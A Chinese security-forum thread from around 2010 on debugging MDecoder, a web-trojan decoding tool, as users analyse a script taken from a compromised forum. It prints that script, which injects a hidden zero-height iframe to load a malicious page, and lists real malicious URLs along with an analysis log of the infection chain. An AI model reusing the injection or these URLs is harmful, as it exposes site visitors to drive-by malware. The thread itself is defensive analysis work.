网马解密辅助工具 MDecoder 升级至0.45

250662772

此网马地址过滤不出来下级网址啊?http://bbs.photops.com

250662772

选择auto然后解密,下面就乱码了,编码问题?

麦田的怪

楼上还能打开那个地址？
能否把页面保存下来给我。

幸福的猪猪

http://bbs.xcdx169.net/include/log.js?knjefn

1. document.writeln("<iframe src=http://game.hsw.cn/plus/task/log.htm?128 width=100 height=0><\/iframe>");
   
2. 
   
3. var a3742tf="51la";var a3742pu="";var a3742pf="51la";var a3742su=window.location;var a3742sf=document.referrer;var a3742of="";var a3742op="";var a3742ops=1;var a3742ot=1;var a3742d=new Date();var a3742color="";if (navigator.appName=="Netscape"){a3742color=screen.pixelDepth;} else {a3742color=screen.colorDepth;}
   
4. try{a3742tf=top.document.referrer;}catch(e){}
   
5. try{a3742pu =window.parent.location;}catch(e){}
   
6. try{a3742pf=window.parent.document.referrer;}catch(e){}
   
7. try{a3742ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3742ops=(a3742ops==null)?1: (parseInt(unescape((a3742ops)[2]))+1);var a3742oe =new Date();a3742oe.setTime(a3742oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3742ops+ ";path=/;expires="+a3742oe.toGMTString();a3742ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3742ot==null){a3742ot=1;}else{a3742ot=parseInt(unescape((a3742ot)[2])); a3742ot=(a3742ops==1)?(a3742ot+1):(a3742ot);}a3742oe.setTime(a3742oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3742ot+";path=/;expires="+a3742oe.toGMTString();}catch(e){}
   
8. a3742of=a3742sf;if(a3742pf!=="51la"){a3742of=a3742pf;}if(a3742tf!=="51la"){a3742of=a3742tf;}a3742op=a3742pu;try{lainframe}catch(e){a3742op=a3742su;}document.write('<img style="width:0px;height:0px" src="http://web2.51.la:82/go.asp?svid=4&id=3483742&tpages='+a3742ops+'&ttimes='+a3742ot+'&tzone='+(0-a3742d.getTimezoneOffset()/60)+'&tcolor='+a3742color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a3742of)+'&vpage='+escape(a3742op)+'" />');
   

复制代码

http://game.hsw.cn/plus/task/log.htm?128   
我这边是解析不出来。附赠一个Google出来的：game.hsw.cn/plus/task/yt.htm

250662772

楼上还能打开那个地址？
能否把页面保存下来给我。
麦田的怪 发表于 2010-1-28 16:50

幸福的猪猪 获取的代码就是,我另外保存了一份,在附件

knjefn.rar (803 Bytes, 下载次数: 461)

2010-1-28 17:26 上传

点击文件名下载附件

IllusionWing

原始 - http://bbs.photops.com/
原始 - http://game.hsw.cn/plus/task/log.htm?128
开始自动解析 - http://game.hsw.cn/plus/task/log.htm?128
L1 - http://game.hsw.cn/plus/task/ye.htm
L1 - http://game.hsw.cn/plus/task/yeu.htm
L2 - http://game.hsw.cn/plus/task/nop.jpg
L2 - http://game.hsw.cn/plus/task/ml.jpg
L2 - http://game.hsw.cn/plus/task/rl.jpg
自动解析 - Auto XOR - 高度可疑 - http://game.hsw.cn/plus/task/x.css

输出的对象 - http://game.hsw.cn/plus/task/x.css



此分析日志由 Illusion Wing 使用 Astox v1 Build 1345 在 2010年1月28日21时54分41秒 生成。


真无稽。。
如果没猜错的话貌似不是编码的问题。
都是ANSI GBK...

麦田的怪

http://bbs.xcdx169.net/include/log.js?knjefn页面中嵌入的框架没有过滤出来是因为正常解密流程解密完毕后没有发现含有exe地址的URL，程序对页面内容进行判断，认为包含有shellcode，所以暴力解密了，结果就成那个样子了。刚才翻了下0.3X的版本，发现也有这个问题。
需要的同学将框架下面的无用内容删掉后再Filter就可以了。
我暂时还没想好一个好的解决方案，或者想好了感觉实现起来有点麻烦。汗。

IllusionWing

回复 27# 麦田的怪


    MDecoder不探测.css后缀名的EXE?
    貌似确实包含SHELLCODE吧，不过我觉得MDecoder最好直接把SHellcode里面的地址抠出来，我相信没几个人愿意去看被破坏的SHellcode。。
    貌似我的也是用的蠢办法。。

麦田的怪

是探测.css后缀的EXE的，呵呵。
在0.1的时候还对URL是否PE文件进行识别，后来感觉对速度影响太大就去掉了。

框架内嵌入的页面是有shellcode，不过当前页面除了一个框架以外似乎还是正常的。
http://bbs.xcdx169.net/include/log.js?knjefn 里面含有大量四个一起的a-z0-9的字符，结果被我认为包含shellcode了。其实可以判断他们间隔是否相同来更好的判断的，但是这都不是好办法，只可以解决一时的问题。以后再说吧，呵呵。

IllusionWing

回复 29# 麦田的怪


    我觉得吧。。检验是不是PE，读取前两个字节初筛一下就可以了。至于那个Shellcode的问题。。我觉得直接输出SHELLCODE的结果就好了。